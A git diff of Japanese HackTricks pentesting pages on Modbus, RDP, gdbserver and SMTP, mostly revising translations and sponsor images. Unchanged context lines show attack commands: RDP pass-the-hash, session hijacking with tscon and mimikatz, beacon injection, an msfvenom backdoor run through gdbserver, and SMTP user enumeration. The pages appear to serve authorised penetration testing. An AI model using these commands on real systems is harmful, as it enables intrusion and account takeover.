* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}

View file

@ -13,16 +13,16 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までのプロセスをサポートします。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
# 基本情報
1979年に**Modbusプロトコル**がModiconによって開発され、メッセージ構造として機能します。このプロトコルの主な用途は、マスター-スレーブ/クライアント-サーバーモデルの下で、インテリジェントデバイス間の通信を促進することです。このプロトコルは、デバイスが効率的にデータを交換するための重要な役割を果たします。
1979年に**Modbusプロトコル**がModiconによって開発され、メッセージ構造として機能します。このプロトコルの主な用途は、マスター-スレーブ/クライアント-サーバーモデルの下で、インテリジェントデバイス間の通信を促進することです。このプロトコルは、デバイスが効率的にデータを交換するのを可能にする重要な役割を果たします。
**デフォルトポート:** 502
```
@ -36,14 +36,14 @@ msf> use auxiliary/scanner/scada/modbusdetect
msf> use auxiliary/scanner/scada/modbus_findunitid
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWSハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで。私たちはペンテスターを置き換えるのではなく、彼らに深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までのプロセスをサポートします。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,9 +15,9 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポート作成までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -25,7 +25,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
Microsoftによって開発された**リモートデスクトッププロトコル****RDP**)は、ネットワークを介してコンピュータ間のグラフィカルインターフェース接続を可能にするように設計されています。この接続を確立するために、ユーザーは**RDP**クライアントソフトウェアを利用し、同時にリモートコンピュータは**RDP**サーバーソフトウェアを操作する必要があります。このセットアップにより、遠隔コンピュータのデスクトップ環境をシームレスに制御およびアクセスでき、実質的にそのインターフェースをユーザーのローカルデバイスに持ち込むことができます。
**デフォルトポート** 3389
**デフォルトポート:** 3389
```
PORT STATE SERVICE
3389/tcp open ms-wbt-server
@ -64,13 +64,13 @@ xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash
```
### RDPサービスに対する既知の資格情報を確認する
impacketのrdp\_check.pyを使用すると、RDPサービスに対していくつかの資格情報が有効かどうかを確認できます:
impacketのrdp\_check.pyを使用すると、いくつかの資格情報がRDPサービスに対して有効かどうかを確認できます
```bash
rdp_check <domain>/<name>:<password>@<IP>
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで対応しています。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -88,7 +88,7 @@ query user
```bash
tscon <ID> /dest:<SESSIONNAME>
```
今、選択したRDPセッションの中にいて、Windowsのツールと機能のみを使用してユーザーを偽装することができます。
今、選択したRDPセッションの中にいて、Windowsのツールと機能だけを使用してユーザーを偽装することができます。
**重要**: アクティブなRDPセッションにアクセスすると、そのセッションを使用していたユーザーが切断されます。
@ -109,7 +109,7 @@ ts::remote /id:2 #Connect to the session
### RDPプロセスインジェクション
異なるドメインの誰かが**より良い権限でRDP経由で**あなたが管理者であるPCにログインした場合、彼の**RDPセッションプロセス**にあなたのビーコンを**インジェクト**し、彼として行動することができます:
異なるドメインの誰か、または**より高い権限を持つユーザーがRDP経由で**あなたが管理者であるPCにログインした場合、彼の**RDPセッションプロセス**にあなたのビーコンを**インジェクト**して、彼のように行動することができます:
{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %}
[rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
@ -128,7 +128,7 @@ net localgroup "Remote Desktop Users" UserLoginName /add
* [**EvilRDP**](https://github.com/skelsec/evilrdp)
* コマンドラインから自動的にマウスとキーボードを制御
* コマンドラインから自動的にクリップボードを制御
* RDPを介してターゲットへのネットワーク通信をチャネルするクライアントからSOCKSプロキシを生成
* クライアントからSOCKSプロキシを生成し、RDPを介してターゲットへのネットワーク通信をチャネル
* ファイルをアップロードせずにターゲット上で任意のSHELLおよびPowerShellコマンドを実行
* ターゲットでファイル転送が無効になっている場合でも、ターゲットとの間でファイルをアップロードおよびダウンロード
@ -151,7 +151,7 @@ Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。
@ -166,7 +166,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
<summary>HackTricksをサポートする</summary>
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>

View file

@ -15,9 +15,9 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポート作成までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポート作成までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -27,9 +27,9 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
**gdbserverを任意のポートでリッスンさせることができ**、現時点で**nmapはサービスを認識できません**。
## エクスプロイト
## Exploitation
### アップロードと実行
### Upload and Execute
**msfvenomを使用してelfバックドアを簡単に作成し**、アップロードして実行できます:
```bash
@ -56,7 +56,7 @@ run
```
### 任意のコマンドを実行する
別の方法として、**デバッガーに任意のコマンドを実行させる** [**pythonカスタムスクリプトをここから取得する**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)。
別の方法として、**デバッガーに任意のコマンドを実行させるための** [**ここから取得したpythonカスタムスクリプト**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)があります
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345
@ -196,7 +196,7 @@ RemoteCmd()
```
{% endcode %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。
@ -212,7 +212,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}

View file

@ -15,17 +15,17 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポート作成までのプロセスをサポートします。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## **基本情報**
**シンプルメール転送プロトコル (SMTP)** は、**電子メールの送受信**に使用されるTCP/IPスイート内のプロトコルです。受信者側でメッセージをキューイングする際の制限から、SMTPはしばしば**POP3またはIMAP**と一緒に使用されます。これらの追加プロトコルにより、ユーザーはサーバーメールボックスにメッセージを保存し、定期的にダウンロードすることができます。
**シンプルメール転送プロトコルSMTP**は、**電子メールの送受信**に使用されるTCP/IPスイート内のプロトコルです。受信者側でメッセージをキューイングする際の制限のため、SMTPはしばしば**POP3またはIMAP**と一緒に使用されます。これらの追加プロトコルは、ユーザーがサーバーメールボックスにメッセージを保存し、定期的にダウンロードできるようにします。
実際には、**電子メールプログラム**が**電子メールを送信するためにSMTPを使用し****受信するためにPOP3またはIMAPを利用する**ことが一般的です。Unixベースのシステムでは、**sendmail**が電子メール目的で最も頻繁に使用されるSMTPサーバーとして際立っています。商業パッケージであるSendmailにはPOP3サーバーが含まれています。さらに、**Microsoft Exchange**はSMTPサーバーを提供し、POP3サポートを含めるオプションを提供しています。
実際には、**電子メールプログラム**が**電子メールを送信するためにSMTPを使用し、受信するためにPOP3またはIMAPを利用する**ことが一般的です。Unixベースのシステムでは、**sendmail**が電子メール目的で最も頻繁に使用されるSMTPサーバーとして際立っています。商業パッケージであるSendmailにはPOP3サーバーが含まれています。さらに、**Microsoft Exchange**はSMTPサーバーを提供し、POP3サポートを含めるオプションを提供します。
**デフォルトポート:** 25,465(ssl),587(ssl)
```
@ -34,11 +34,11 @@ PORT STATE SERVICE REASON VERSION
```
### EMAIL Headers
もし**被害者にメールを送信させる機会がある**(例えば、ウェブページのコンタクトフォームを通じて)、それを行ってください。なぜなら、**メールのヘッダーを見ることで被害者の内部トポロジーについて学ぶことができる**からです。
もし**被害者にメールを送信させる機会がある**(例えば、ウェブページのコンタクトフォームを通じて)、それを行ってください。なぜなら、**メールのヘッダーを見被害者の内部トポロジーについて学ぶことができる**からです。
また、**存在しないアドレスにメールを送信しようとすることでSMTPサーバーからメールを取得する**こともできますサーバーは攻撃者にNDNメールを送信します。ただし、許可されたアドレスからメールを送信しSPFポリシーを確認、NDNメッセージを受信できることを確認してください。
さらに、**異なる内容を送信して、ヘッダーにより興味深い情報を見つける**ことを試みるべきです。例えば、`X-Virus-Scanned: by av.domain.com`のような情報です。\
さらに、**異なる内容を送信して、ヘッダーにより興味深い情報を見つける**ことを試みるべきです。例えば `X-Virus-Scanned: by av.domain.com`\
EICARテストファイルを送信してください。\
**AV**を検出することで、**既知の脆弱性を悪用する**ことができるかもしれません。
@ -79,7 +79,7 @@ NTLM supported
```
Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
### Internal server name - 情報漏洩
### 内部サーバー名 - 情報漏洩
Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
```
@ -167,15 +167,15 @@ Metasploit: auxiliary/scanner/smtp/smtp_enum
smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
Nmap: nmap --script smtp-enum-users <IP>
```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## DSNレポート
**配信状況通知レポート**: 組織に**無効なアドレス**に**メール**を送信すると、組織はそのアドレスが無効であることを通知し、**あなたにメールを返します**。返送されたメールの**ヘッダー**には、レポートとやり取りしたメールサービスの**IPアドレス**やアンチウイルスソフトウェアの情報など、可能性のある**機密情報**が**含まれます**。
**配信状況通知レポート**: 組織に**無効なアドレス**に**メール**を送信すると、組織はそのアドレスが無効であることを通知し、**メールを返します**。返送されたメールの**ヘッダー**には、レポートとやり取りしたメールサービスの**IPアドレス**やアンチウイルスソフトウェアの情報など、可能性のある**機密情報**が**含まれます**。
## [コマンド](smtp-commands.md)
@ -242,9 +242,9 @@ print("[***]successfully sent email to %s:" % (msg['To']))
```
</details>
## SMTP スマグリング
## SMTPスムーグリング
SMTP スマグリングの脆弱性により、すべての SMTP 保護をバイパスすることが可能でした保護に関する詳細は次のセクションを参照してください。SMTP スマグリングの詳細については、以下を確認してください:
SMTPスムーグリングの脆弱性により、すべてのSMTP保護をバイパスすることが可能でした保護に関する詳細は次のセクションを参照してください。SMTPスムーグリングの詳細については、以下を確認してください:
{% content-ref url="smtp-smuggling.md" %}
[smtp-smuggling.md](smtp-smuggling.md)
@ -252,48 +252,48 @@ SMTP スマグリングの脆弱性により、すべての SMTP 保護をバイ
## メールスプーフィング対策
組織は、SMTP メッセージのスプーフィングの容易さから、**SPF**、**DKIM**、および **DMARC** を採用することにより、無許可のメールが自分たちの名義で送信されるのを防ぎます。
組織は、SMTPメッセージのスプーフィングの容易さから、**SPF**、**DKIM**、および**DMARC**を採用することで、無許可のメールが自分たちの名義で送信されるのを防ぎます。
**これらの対策に関する完全なガイド**は [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/) で入手できます。
**これらの対策に関する完全なガイド**は、[https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/)で入手できます。
### SPF
{% hint style="danger" %}
SPF [は2014年に「非推奨」となりました](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。これは、`_spf.domain.com` **TXT レコード**を作成する代わりに、**同じ構文**を使用して `domain.com` に作成することを意味します。\
さらに、以前の SPF レコードを再利用するために、`"v=spf1 include:_spf.google.com ~all"` のようなものを見つけることは非常に一般的です。
SPF [は2014年に「非推奨」となりました](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/)。これは、`_spf.domain.com`に**TXTレコード**を作成する代わりに、**同じ構文**を使用して`domain.com`に作成することを意味します。\
さらに、以前のspfレコードを再利用するために、`"v=spf1 include:_spf.google.com ~all"`のようなものを見つけることは非常に一般的です。
{% endhint %}
**送信者ポリシーフレームワーク** (SPF) は、メール転送エージェント (MTA) が、メールを送信しているホストが組織によって定義された承認されたメールサーバーのリストを照会することにより、承認されているかどうかを確認できるメカニズムです。このリストには、**ドメイン名を代表してメールを送信すること許可された**さまざまな「**メカニズム**」が含まれています。
**送信者ポリシーフレームワーク**SPFは、メール転送エージェントMTAが、メールを送信しているホストが組織によって定義された承認されたメールサーバーのリストを照会することで、そのホストがメールを送信する権限を持っているかどうかを確認できるメカニズムです。このリストには、**ドメイン名を代表してメールを送信すること許可された**さまざまな「**メカニズム**」が含まれています。
#### メカニズム
[ウィキペディア](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework)から:
[Wikipedia](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework)から:
| メカニズム | 説明 |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL | 常に一致します。以前のメカニズムで一致しなかったすべての IP に対して、`-all` のようなデフォルト結果に使用されます。 |
| A | ドメイン名に送信者のアドレスに解決できるアドレスレコード (A または AAAA) がある場合、一致します。 |
| IP4 | 送信者が指定された IPv4 アドレス範囲にある場合、一致します。 |
| IP6 | 送信者が指定された IPv6 アドレス範囲にある場合、一致します。 |
| MX | ドメイン名に送信者のアドレスに解決する MX レコードがある場合、一致しますつまり、メールはドメインの受信メールサーバーの1つから来ます。 |
| PTR | クライアントのアドレスのドメイン名 (PTR レコード) が指定されたドメインにあり、そのドメイン名がクライアントのアドレスに解決する場合(前方確認済み逆引き DNS、一致します。このメカニズムは推奨されず、可能な限り避けるべきです。 |
| EXISTS | 指定されたドメイン名が任意のアドレスに解決る場合、一致します解決されるアドレスに関係なく。これはめったに使用されません。SPF マクロ言語と組み合わせることで、DNSBL クエリのようなより複雑な一致を提供します。 |
| ALL | 常に一致します。以前のメカニズムで一致しなかったすべてのIPに対して、`-all`のようなデフォルト結果に使用されます。 |
| A | ドメイン名に送信者のアドレスに解決できるアドレスレコードAまたはAAAAがある場合、一致します。 |
| IP4 | 送信者が指定されたIPv4アドレス範囲にある場合、一致します。 |
| IP6 | 送信者が指定されたIPv6アドレス範囲にある場合、一致します。 |
| MX | ドメイン名に送信者のアドレスに解決するMXレコードがある場合、一致しますつまり、メールはドメインの受信メールサーバーの1つから来ます。 |
| PTR | クライアントのアドレスのドメイン名PTRレコードが指定されたドメインにあり、そのドメイン名がクライアントのアドレスに解決される場合(前方確認済み逆DNS、一致します。このメカニズムは推奨されず、可能な限り避けるべきです。 |
| EXISTS | 指定されたドメイン名が任意のアドレスに解決される場合、一致します解決されるアドレスに関係なく。これはめったに使用されません。SPFマクロ言語と組み合わせることで、DNSBLクエリのようなより複雑な一致を提供します。 |
| INCLUDE | 別のドメインのポリシーを参照します。そのドメインのポリシーが通過すれば、このメカニズムも通過します。ただし、含まれたポリシーが失敗した場合、処理は続行されます。他のドメインのポリシーに完全に委任するには、リダイレクト拡張を使用する必要があります。 |
| REDIRECT | <p>リダイレクトは、SPF ポリシーをホストする別のドメイン名へのポインタであり、複数のドメインが同じ SPF ポリシーを共有できるようにします。これは、同じメールインフラストラクチャを共有する多数のドメインで作業する際に便利です。</p><p>リダイレクトメカニズムで示されたドメインの SPF ポリシーが使用されます。</p> |
| REDIRECT | <p>リダイレクトは、SPFポリシーをホストする別のドメイン名へのポインタであり、複数のドメインが同じSPFポリシーを共有できるようにします。これは、同じメールインフラストラクチャを共有する多数のドメインで作業する際に便利です。</p><p>リダイレクトメカニズムで示されたドメインのSPFポリシーが使用されます。</p> |
**クオリファイア**を特定することも可能で、**メカニズムが一致した場合に何をすべきかを示します**。デフォルトでは、**クオリファイア「+」**が使用されます(したがって、メカニズムが一致する場合、それは許可されていることを意味します)。\
通常、各 SPF ポリシーの**最後に**、**\~all** または **-all** のようなものが表示されます。これは、**送信者がどの SPF ポリシーにも一致しない場合、メールを信頼できない(\~)または拒否する(-)としてタグ付けすべきであることを示します。**
**クオリファイア**を特定することも可能で、**メカニズムが一致した場合に何をすべきかを示します**。デフォルトでは、**クオリファイア「+」**が使用されます(したがって、いずれかのメカニズムが一致する場合、それは許可されていることを意味します)。\
通常、**各SPFポリシーの最後に**、**\~all**または**-all**のようなものが記載されています。これは、**送信者がどのSPFポリシーにも一致しない場合、メールを信頼できない(\~)または拒否する(-)としてタグ付けすべきことを示します。**
#### クオリファイア
ポリシー内の各メカニズムは、意図された結果を定義するために4つのクオリファイアのいずれかで接頭辞を付けることができます
ポリシー内の各メカニズムは、意図された結果を定義するために4つのクオリファイアのいずれかで接頭辞を付けることができます
* **`+`**: PASS 結果に対応します。デフォルトで、メカニズムはこのクオリファイアを仮定し、`+mx` `mx` と同等です。
* **`?`**: NEUTRAL 結果を表し、NONE特定のポリシーなしと同様に扱われます。
* **`~`**: SOFTFAIL を示し、NEUTRAL と FAIL の中間の立場を取ります。この結果に該当するメールは通常受け入れられますが、適切にマークされます。
* **`-`**: FAIL を示し、メールは完全に拒否されるべきであることを示唆します。
* **`+`**: PASS結果に対応します。デフォルトで、メカニズムはこのクオリファイアを仮定し、`+mx`は`mx`と同等です。
* **`?`**: NEUTRAL結果を表し、NONE特定のポリシーなしと同様に扱われます。
* **`~`**: SOFTFAILを示し、NEUTRALとFAILの中間の立場を取ります。この結果を満たすメールは通常受け入れられますが、適切にマークされます。
* **`-`**: FAILを示し、メールは完全に拒否されるべきことを示唆します。
次の例では、**google.com SPF ポリシー**が示されています。最初の SPF ポリシー内に異なるドメインからの SPF ポリシーが含まれていることに注意してください:
次の例では、**google.comのSPFポリシー**が示されています。最初のSPFポリシー内に異なるドメインからのSPFポリシーが含まれていることに注意してください
```shell-session
dig txt google.com | grep spf
google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all"
@ -318,9 +318,9 @@ _netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:1
### DKIM (DomainKeys Identified Mail)
DKIMは、外部のメール転送エージェントMTAによる検証を可能にするために、送信メールに署名するために利用されます。これにより、ドメインの公開鍵をDNSから取得できます。この公開鍵は、ドメインのTXTレコードにあります。この鍵にアクセスするには、セレクタとドメイン名の両方を知っている必要があります。
DKIMは、外部のメール転送エージェントMTAによる検証を可能にするために、送信メールに署名するために利用されます。これは、DNSからドメインの公開鍵を取得することによって行われます。この公開鍵は、ドメインのTXTレコードにあります。この鍵にアクセスするには、セレクタとドメイン名の両方を知っている必要があります。
例えば、鍵を要求するには、ドメイン名とセレクタが必要です。これらはメールヘッダーの`DKIM-Signature`に見つけることができます。例: `d=gmail.com;s=20120113`
例えば、鍵を要求するには、ドメイン名とセレクタが必要です。これらはメールヘッダーの`DKIM-Signature`に見つけることができます。例: `d=gmail.com;s=20120113`
この情報を取得するためのコマンドは次のようになります:
```bash
@ -330,7 +330,7 @@ dig 20120113._domainkey.gmail.com TXT | grep p=
```
### DMARC (Domain-based Message Authentication, Reporting & Conformance)
DMARCは、SPFおよびDKIMプロトコルを基にしてメールセキュリティを強化します。特定のドメインからのメールの取り扱いに関するポリシーを概説し、認証失敗への対処方法やメール処理アクションに関する報告をどこに送信するかを含みます。
DMARCは、SPFおよびDKIMプロトコルを基にしてメールセキュリティを強化します。特定のドメインからのメールの取り扱いに関するポリシーを定め、認証失敗への対処方法やメール処理アクションに関する報告をどこに送信するかを示します。
**DMARCレコードを取得するには、サブドメイン\_dmarcをクエリする必要があります**
```bash
@ -346,7 +346,7 @@ _dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-repor
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
```
#### DMARCタグ
#### DMARC タグ
| タグ名 | 目的 | サンプル |
| -------- | --------------------------------------------- | ------------------------------- |
@ -359,17 +359,17 @@ _dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMA
| adkim | DKIMの整合性モード | adkim=s |
| aspf | SPFの整合性モード | aspf=r |
### **サブドメインについてはどうですか**
### **サブドメインについては?**
